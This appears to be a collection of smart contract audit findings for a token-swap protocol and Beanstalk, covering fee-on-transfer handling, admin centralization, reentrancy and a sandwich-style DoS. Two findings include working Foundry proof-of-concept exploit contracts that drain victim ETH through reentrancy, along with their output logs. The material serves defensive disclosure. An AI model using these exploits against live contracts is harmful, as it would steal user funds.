The protocol intends to support all ERC20 tokens but does not support fee-on-transfer tokens. The protocol utilizes the functions `TransferUtils::_transferERC20()` and `TransferUtils::_transferFromERC20()` to transfer ERC20 tokens.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n\\nThe implementation verifies that the transfer was successful by checking that the balance of the recipient is greater than or equal to the initial balance plus the amount transferred. This check will fail for fee-on-transfer tokens because the actual received amount will be less than the input amount. (Read here about fee-on-transfer tokens)\\nAlthough there are very few fee-on-transfer tokens, the protocol can't say it supports all ERC20 tokens if it doesn't support these weird ERC20 tokens.
The transfer utility functions can be updated to return the actually received amount. Or clearly document that only standard ERC20 tokens are supported.
Fee-on-transfer tokens can not be used for the protocol. Because of the rarity of these tokens, we evaluate this finding as a Medium risk.
```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), "Token Address is not an ERC20");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), "ERC20 Transfer failed");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), "ERC20 Balance check failed");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n
Centralization risk
medium
The protocol has an owner with privileged rights to perform admin tasks that can affect users. Especially, the owner can change the fee settings and reward handler address.\\nValidation is missing for admin fee setter functions.\\n```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, "Fee percentage must be less than 1");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n\\nImportant changes initiated by admin should be logged via events.\\n```\\nFile: helpers/FeeData.sol\\n\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n\\n function setMaxHops(uint256 maxHops) external onlyOwner {\\n\\n function setMaxSwaps(uint256 maxSwaps) external onlyOwner {\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {\\n\\n function setFeeToken(address feeTokenAddress) public onlyOwner {\\n\\n function setFeeTokens(address[] memory feeTokenAddresses) public onlyOwner {\\n\\n function clearFeeTokens() public onlyOwner {\\n```\\n\\n```\\nFile: helpers/TransferHelper.sol\\n\\n function setRewardHandler(address rewardAddress) external onlyOwner {\\n\\n function setRewardsActive(bool _rewardsActive) external onlyOwner {\\n```\\n
Specify the owner's privileges and responsibilities in the documentation.\\nAdd constant state variables that can be used as the minimum and maximum values for the fee settings.\\nAdd proper validation for the admin functions.\\nLog the changes in the important state variables via events.
While the protocol owner is regarded as a trusted party, the owner can change the fee settings and reward handler address without any validation or logging. This can lead to unexpected results and users can be affected.
```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, "Fee percentage must be less than 1");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n
Validation is missing for tokenA in `SwapExchange::calculateMultiSwap()`
low
The protocol supports claiming a chain of swaps and the function `SwapExchange::calculateMultiSwap()` is used to do some calculations including the amount of tokenA that can be received for a given amount of tokenB. Looking at the implementation, the protocol does not validate that the tokenA of the last swap in the chain is actually the same as the tokenA of `multiClaimInput`. Because this view function is supposed to be used by the frontend to 'preview' the result of a `MultiSwap`, this does not imply a direct security risk but can lead to unexpected results. (It is notable that the actual swap function `SwapExchange::_claimMultiSwap()` implemented a proper validation.)\\n```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n
Add a validation that the tokenA of the last swap in the chain is the same as the tokenA of `multiClaimInput`.
The function will return an incorrect swap calculation result if the last swap in the chain has a different tokenA than the tokenA of `multiClaimInput` and it can lead to unexpected results.
```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n
Intermediate value sent by the caller can be drained via reentrancy when `Pipeline` execution is handed off to an untrusted external contract
high
Pipeline is a utility contract created by the Beanstalk Farms team that enables the execution of an arbitrary number of valid actions in a single transaction. The `DepotFacet` is a wrapper around Pipeline for use within the Beanstalk Diamond proxy. When utilizing Pipeline through the `DepotFacet`, Ether value is first loaded by a payable call to the Diamond proxy fallback function, which then delegates execution to the logic of the respective facet function. Once the `DepotFacet::advancedPipe` is called, for example, value is forwarded on to a function of the same name within Pipeline.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n\\nThe important point to note here is that rather than sending the full Ether amount received by the Diamond proxy, the amount sent to Pipeline is equal to that of the `value` argument above, necessitating the use of `LibEth::refundEth`, which itself transfers the entire proxy Ether balance to the caller, following the call to return any unspent Ether.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, "Eth transfer Failed.");\\n }\\n}\\n```\\n\\nThis logic appears to be correct and work as intended; however, issues can arise due to the lack of reentrancy guard on `DepotFacet` and `Pipeline` functions. Given the nature of `Pipeline` calls to potentially untrusted external contracts, which themselves may also hand off execution to their own set of untrusted external contracts, this can become an issue if a malicious contract calls back into Beanstalk and/or `Pipeline`.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n returns (bytes[] memory results) {\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n }\\n```\\n\\nContinuing with the example of `DepotFacet::advancedPipe`, say, for example, one of the pipe calls involves an NFT mint/transfer in which some external contract is paid royalties in the form of a low-level call with ETH attached or some safe transfer check hands-off execution in this way, the malicious recipient could initiate a call to the Beanstalk Diamond which once again triggers `DepotFacet::advancedPipe` but this time with an empty `pipes` array. Given the implementation of `Pipeline::advancedPipe` above, this will simply return an empty bytes array and fall straight through to the ETH refund. Since the proxy balance is non-zero, assuming `value != msg.value` in the original call, this `msg.value - value` difference will be transferred to the malicious caller. Once execution returns to the original context and the original caller's transaction is nearing completion, the contract will no longer have any excess ETH, even though it is the original caller who should have received a refund of unspent funds.\\nThis finding also applies to `Pipeline` itself, in which a malicious contract can similarly reenter `Pipeline` and utilize intermediate Ether balance without sending any `value` of their own. For example, given `getEthValue` does not validate the clipboard `value` against the payable `value` (likely due to its current usage within a loop), `Pipeline::advancedPipe` could be called with a single `AdvancedPipeCall` with normal pipe encoding which calls another address owned by the attacker, again forwarding all remaining Ether given they are able to control the `value` parameter. It is, of course, feasible that the original caller attempts to perform some other more complicated pipes following the first, which may revert with 'out of funds' errors, causing the entire advanced pipe call to fail if no tolerant mode behavior is implemented on the target contract, so the exploiter would need to be strategic in these scenarios if they wish to elevate they exploit from denial-of-service to the stealing of funds.
Add reentrancy guards to both the `DepotFacet` and `Pipeline`. Also, consider validating clipboard Ether values in `Pipeline::_advancedPipe` against the payable function value in `Pipeline::advancedPipe`.
A malicious external contract handed control of execution during the lifetime of a Pipeline call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of an NFT royalty recipient, for example, to re-enter both Beanstalk and Pipeline, draining funds remaining in the Diamond and Pipeline that should have been refunded to/utilized by the original caller at the end of execution:\\n```\\ncontract DepotFacetPoC is Test {\\n RoyaltyRecipient exploiter;\\n address exploiter1;\\n DummyNFT dummyNFT;\\n address victim;\\n\\n function setUp() public {\\n vm.createSelectFork("mainnet", ATTACK_BLOCK);\\n\\n exploiter = new RoyaltyRecipient();\\n dummyNFT = new DummyNFT(address(exploiter));\\n victim = makeAddr("victim");\\n vm.deal(victim, 10 ether);\\n\\n exploiter1 = makeAddr("exploiter1");\\n console.log("exploiter1: ", exploiter1);\\n\\n address _pipeline = address(new Pipeline());\\n vm.etch(PIPELINE, _pipeline.code);\\n\\n vm.label(BEANSTALK, "Beanstalk Diamond");\\n vm.label(address(dummyNFT), "DummyNFT");\\n vm.label(address(exploiter), "Exploiter");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint("Victim balance before: ", victim.balance);\\n emit log_named_uint("BEANSTALK balance before: ", BEANSTALK.balance);\\n emit log_named_uint("PIPELINE balance before: ", PIPELINE.balance);\\n emit log_named_uint("DummyNFT balance before: ", address(dummyNFT).balance);\\n emit log_named_uint("Exploiter balance before: ", address(exploiter).balance);\\n emit log_named_uint("Exploiter1 balance before: ", exploiter1.balance);\\n\\n vm.startPrank(victim);\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(dummyNFT), abi.encodePacked(dummyNFT.mintNFT.selector), abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(1 ether)));\\n IBeanstalk(BEANSTALK).advancedPipe{value: 10 ether}(pipes, 4 ether);\\n vm.stopPrank();\\n\\n emit log_named_uint("Victim balance after: ", victim.balance);\\n emit log_named_uint("BEANSTALK balance after: ", BEANSTALK.balance);\\n emit log_named_uint("PIPELINE balance after: ", PIPELINE.balance);\\n emit log_named_uint("DummyNFT balance after: ", address(dummyNFT).balance);\\n emit log_named_uint("Exploiter balance after: ", address(exploiter).balance);\\n emit log_named_uint("Exploiter1 balance after: ", exploiter1.balance);\\n }\\n}\\n\\ncontract DummyNFT {\\n address immutable i_royaltyRecipient;\\n constructor(address royaltyRecipient) {\\n i_royaltyRecipient = royaltyRecipient;\\n }\\n\\n function mintNFT() external payable returns (bool success) {\\n // imaginary mint/transfer logic\\n console.log("minting/transferring NFT");\\n // console.log("msg.value: ", msg.value);\\n\\n // send royalties\\n uint256 value = msg.value / 10;\\n console.log("sending royalties");\\n (success, ) = payable(i_royaltyRecipient).call{value: value}("");\\n }\\n}\\n\\ncontract RoyaltyRecipient {\\n bool exploited;\\n address constant exploiter1 = 0xDE47CfF686C37d501AF50c705a81a48E16606F08;\\n\\n fallback() external payable {\\n console.log("entered exploiter fallback");\\n console.log("Beanstalk balance: ", BEANSTALK.balance);\\n console.log("Pipeline balance: ", PIPELINE.balance);\\n console.log("Exploiter balance: ", address(this).balance);\\n if (!exploited) {\\n exploited = true;\\n console.log("exploiting depot facet advanced pipe");\\n IBeanstalk(BEANSTALK).advancedPipe(new AdvancedPipeCall[](0), 0);\\n console.log("exploiting pipeline advanced pipe");\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(exploiter1), "", abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(PIPELINE.balance)));\\n IPipeline(PIPELINE).advancedPipe(pipes);\\n }\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to net 9 additional Ether at the expense of the victim:\\n```\\nRunning 1 test for test/DepotFacetPoC.t.sol:DepotFacetPoC\\n[PASS] test_attack() (gas: 182190)\\nLogs:\\n exploiter1: 0xDE47CfF686C37d501AF50c705a81a48E16606F08\\n Victim balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n PIPELINE balance before: : 0\\n DummyNFT balance before: : 0\\n Exploiter balance before: : 0\\n Exploiter1 balance before: : 0\\n entered pipeline advanced pipe\\n msg.value: 4000000000000000000\\n minting/transferring NFT\\n sending royalties\\n entered exploiter fallback\\n Beanstalk balance: 6000000000000000000\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 100000000000000000\\n exploiting depot facet advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 6100000000000000000\\n exploiting pipeline advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n Victim balance after: : 0\\n BEANSTALK balance after: : 0\\n PIPELINE balance after: : 0\\n DummyNFT balance after: : 900000000000000000\\n Exploiter balance after: : 6100000000000000000\\n Exploiter1 balance after: : 3000000000000000000\\n```\\n
```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n
`FarmFacet` functions are susceptible to the draining of intermediate value sent by the caller via reentrancy when execution is handed off to an untrusted external contract
high
The `FarmFacet` enables multiple Beanstalk functions to be called in a single transaction using Farm calls. Any function stored in Beanstalk's EIP-2535 DiamondStorage can be called as a Farm call and, similar to the Pipeline calls originated in the `DepotFacet`, advanced Farm calls can be made within `FarmFacet` utilizing the "clipboard" encoding documented in `LibFunction`.\\nBoth `FarmFacet::farm` and `FarmFacet::advancedFarm` make use of the `withEth` modifier defined as follows:\\n```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n\\nUsed in conjunction with `LibEth::refundEth`, within the `DepotFacet`, for example, the call is identified as originating from the `FarmFacet` if `s.isFarm == 2`. This indicates that an ETH refund should occur at the end of top-level `FarmFacet` function call rather than intermediate Farm calls within Beanstalk so that the value can be utilized in subsequent calls.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, "Eth transfer Failed.");\\n }\\n}\\n```\\n\\nSimilar to the vulnerabilities in `DepotFacet` and `Pipeline`, `FarmFacet` Farm functions are also susceptible to the draining of intermediate value sent by the caller via reentrancy by an untrusted and malicious external contract. In this case, the attacker could be the recipient of Beanstalk Fertilizer, for example, given this is a likely candidate for an action that may be performed via `FarmFacet` functions, utilizing `TokenSupportFacet::transferERC1155`, and because transfers of these tokens are performed "safely" by calling `Fertilizer1155:__doSafeTransferAcceptanceCheck` which in turn calls the `IERC1155ReceiverUpgradeable::onERC1155Received` hook on the Fertilizer recipient.\\nContinuing the above example, a malicious recipient could call back into the `FarmFacet` and re-enter the Farm functions via the `Fertilizer1155` safe transfer acceptance check with empty calldata and only `1 wei` of payable value. This causes the execution of the attacker's transaction to fall straight through to the refund logic, given no loop iterations occur on the empty data and the conditional blocks within the modifier are entered due to the (ever so slightly) non-zero `msg.value`. The call to `LibEth::refundEth` will succeed sinces.isFarm == 1 in the attacker's context, sending the entire Diamond proxy balance. When execution continues in the context of the original caller's Farm call, it will still enter the conditional since their `msg.value` was also non-zero; however, there is no longer any ETH balance to refund, so this call will fall through without sending any value as the conditional block is not entered.
Add a reentrancy guard to `FarmFacet` Farm functions.\\n\\clearpage
A malicious external contract handed control of execution during the lifetime of a Farm call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of a Fertilizer recipient, for example, to re-enter Beanstalk, draining funds remaining in the Diamond that should have been refunded to the original caller at the end of execution:\\n```\\ncontract FertilizerRecipient {\\n bool exploited;\\n\\n function onERC1155Received(address, address, uint256, uint256, bytes calldata) external returns (bytes4) {\\n console.log("entered exploiter onERC1155Received");\\n if (!exploited) {\\n exploited = true;\\n console.log("exploiting farm facet farm call");\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](0);\\n IBeanstalk(BEANSTALK).advancedFarm{value: 1 wei}(data);\\n console.log("finished exploiting farm facet farm call");\\n }\\n return bytes4(0xf23a6e61);\\n }\\n\\n fallback() external payable {\\n console.log("entered exploiter fallback");\\n console.log("Beanstalk balance: ", BEANSTALK.balance);\\n console.log("Exploiter balance: ", address(this).balance);\\n }\\n}\\n\\ncontract FarmFacetPoC is Test {\\n uint256 constant TOKEN_ID = 3445713;\\n address constant VICTIM = address(0x995D1e4e2807Ef2A8d7614B607A89be096313916);\\n FertilizerRecipient exploiter;\\n\\n function setUp() public {\\n vm.createSelectFork("mainnet", ATTACK_BLOCK);\\n\\n FarmFacet farmFacet = new FarmFacet();\\n vm.etch(FARM_FACET, address(farmFacet).code);\\n\\n Fertilizer fert = new Fertilizer();\\n vm.etch(FERTILIZER, address(fert).code);\\n\\n assertGe(IERC1155(FERTILIZER).balanceOf(VICTIM, TOKEN_ID), 1, "Victim does not have token");\\n\\n exploiter = new FertilizerRecipient();\\n vm.deal(address(exploiter), 1 wei);\\n\\n vm.label(VICTIM, "VICTIM");\\n vm.deal(VICTIM, 10 ether);\\n\\n vm.label(BEANSTALK, "Beanstalk Diamond");\\n vm.label(FERTILIZER, "Fertilizer");\\n vm.label(address(exploiter), "Exploiter");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint("VICTIM balance before: ", VICTIM.balance);\\n emit log_named_uint("BEANSTALK balance before: ", BEANSTALK.balance);\\n emit log_named_uint("Exploiter balance before: ", address(exploiter).balance);\\n\\n vm.startPrank(VICTIM);\\n // approve Beanstalk to transfer Fertilizer\\n IERC1155(FERTILIZER).setApprovalForAll(BEANSTALK, true);\\n\\n // encode call to `TokenSupportFacet::transferERC1155`\\n bytes4 selector = 0x0a7e880c;\\n assertEq(IBeanstalk(BEANSTALK).facetAddress(selector), address(0x5e15667Bf3EEeE15889F7A2D1BB423490afCb527), "Incorrect facet address/invalid function");\\n\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](1);\\n data[0] = AdvancedFarmCall(abi.encodeWithSelector(selector, address(FERTILIZER), address(exploiter), TOKEN_ID, 1), abi.encodePacked(bytes1(0x00)));\\n IBeanstalk(BEANSTALK).advancedFarm{value: 10 ether}(data);\\n vm.stopPrank();\\n\\n emit log_named_uint("VICTIM balance after: ", VICTIM.balance);\\n emit log_named_uint("BEANSTALK balance after: ", BEANSTALK.balance);\\n emit log_named_uint("Exploiter balance after: ", address(exploiter).balance);\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to steal the excess 10 Ether sent by the victim:\\n```\\nRunning 1 test for test/FarmFacetPoC.t.sol:FarmFacetPoC\\n[PASS] test_attack() (gas: 183060)\\nLogs:\\n VICTIM balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n Exploiter balance before: : 1\\n data.length: 1\\n entered __doSafeTransferAcceptanceCheck\\n to is contract, calling hook\\n entered exploiter onERC1155Received\\n exploiting farm facet farm call\\n data.length: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Exploiter balance: 10000000000000000001\\n finished exploiting farm facet farm call\\n VICTIM balance after: : 0\\n BEANSTALK balance after: : 0\\n Exploiter balance after: : 10000000000000000001\\n```\\n
```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n
Duplicate fees will be paid by `LibTransfer::transferFee` when transferring fee-on-transfer tokens with `EXTERNAL_INTERNAL` 'from' mode and `EXTERNAL` 'to' mode
medium
Beanstalk utilizes an internal virtual balance system that significantly reduces transaction fees when using tokens that are intended to remain within the protocol. `LibTransfer` achieves this by managing every transfer between accounts, considering both the origin 'from' and destination 'to' modes of the in-flight funds. As a result, there are four types of transfers based on the source of the funds (from mode):\\nEXTERNAL: The sender will not use their internal balances for the operation.\\nINTERNAL: The sender will use their internal balances for the operation.\\nEXTERNAL_INTERNAL: The sender will attempt to utilize their internal balance to transfer all desired funds. If funds remain to be sent, their externally owned funds will be utilized to cover the difference.\\nINTERNAL_TOLERANT: The sender will utilize their internal balances for the operation. With insufficient internal balance, the operation will continue (without reverting) with this reduced amount. It is, therefore, imperative to always check the return value of LibTransfer functions to continue the execution of calling functions with the true utilized amount, especially in this internal tolerant case.\\nThe current implementation of `LibTransfer::transferToken` for `(from mode: EXTERNAL ; to mode: EXTERNAL)` ensures a safe transfer operation from the sender to the recipient:\\n```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n\\nPerforming this operation allows duplication of fee-on-transfer token fees to be avoided if funds are first transferred to the contract and then to the recipient; however, `LibTransfer::transferToken` balance will incur double the fee if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` when the internal balance is insufficient cover the full transfer amount, given that:\\nThe remaining token balance would first be transferred to the Beanstalk Diamond, incurring fees.\\nThe remaining token balance would then be transferred to the recipient, incurring fees again.
Add an internal function `LibTransfer::handleFromExternalInternalToExternalTransfer` to handle this case to avoid duplication of fees. For instance:\\n```\\nfunction handleFromExternalInternalToExternalTransfer(\\n IERC20 token,\\n address sender,\\n address recipient,\\n address amount\\n) internal {\\n uint256 amountFromInternal = LibBalance.decreaseInternalBalance(\\n sender,\\n token,\\n amount,\\n true // allowPartial to avoid revert\\n );\\n uint256 pendingAmount = amount - amountFromInternal;\\n if (pendingAmount != 0) {\\n token.safeTransferFrom(sender, recipient, pendingAmount);\\n }\\n token.safeTransfer(sender, amountFromInternal);\\n}\\n```\\n\\nThen consider the use of this new function in LibTransfer::transferToken:\\n```\\n function transferToken(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount,\\n From fromMode,\\n To toMode\\n ) internal returns (uint256 transferredAmount) {\\n// Remove the line below\\n if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n// Add the line below\\n if (toMode == To.EXTERNAL) {\\n// Add the line below\\n if (fromMode == From.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n// Add the line below\\n } else if (fromMode == From.EXTERNAL_INTERNAL) {\\n// Add the line below\\n handleFromExternalInternalToExternalTransfer(token, sender, recipient, amount);\\n// Add the line below\\n return amount;\\n// Add the line below\\n }\\n }\\n amount = receiveToken(token, amount, sender, fromMode);\\n sendToken(token, amount, recipient, toMode);\\n return amount;\\n }\\n```\\n
`LibTransfer::transferToken` will incur duplicate fees if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` with fee-on-transfer tokens if the internal balance is not sufficient to cover the full transfer amount.\\nEven though Beanstalk currently does not impose any fees on token transfers, USDT is associated with the protocol, and its contract has already introduced logic to implement a fee on token transfer mechanism if ever desired in the future. Considering that the duplication of fees implies a loss of funds, but also taking into account the low likelihood of this issue occurring, the severity assigned to this issue is MEDIUM.
```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n
Flood mechanism is susceptible to DoS attacks by a frontrunner, breaking re-peg mechanism when BEAN is above 1 USD
medium
A call to the BEAN/3CRV Metapool is made withinWeather::sop, swapping Beans for 3CRV, to aid in returning Beanstalk to peg via a mechanism known as "Flood" (formerly Season of Plenty, or sop) when the Beanstalk Farm has been "Oversaturated" ($P > 1$; $Pod Rate < 5%$) for more than one Season and for each additional Season in which it continues to be Oversaturated. This is achieved by minting additional Beans and selling them directly on Curve, distributing the proceeds from the sale as 3CRV to Stalkholders.\\nUnlike `Oracle::stepOracle`, which returns the aggregate time-weighted `deltaB` value across both the BEAN/3CRV Metapool and BEAN/ETH Well, the current shortage/excess of Beans during the handling of Rain in `Weather::stepWeather` are calculated directly from the Curve Metapool via `LibBeanMetaCurve::getDeltaB`.\\n```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n\\nThis introduces the possibility that a long-tail MEV bot could perform a denial-of-service attack on the Flood mechanism by performing a sandwich attack on `SeasonFacet::gm` whenever the conditions are met such that `Weather::sop` is called. The attacker would first front-run the transaction by selling BEAN for 3CRV, bringing the price of BEAN back to peg, which could result in `newBeans <= 0`, thus bypassing the subsequent logic, and then back-running to repurchase their sold BEAN effectively maintaining the price of BEAN above peg.\\nThe cost for performing this attack is 0.08% of the utilized funds. However, not accounting for other mechanisms (such as Convert) designed to return the price of Bean to peg, Beanstalk would need to wait the Season duration of 1 hour before making another effective `SeasonFacet::gm`, provided that the previous transaction did not revert. In the subsequent call, the attacker can replicate this action at the same cost, and it is possible that the price of BEAN may have increased further during this hour.
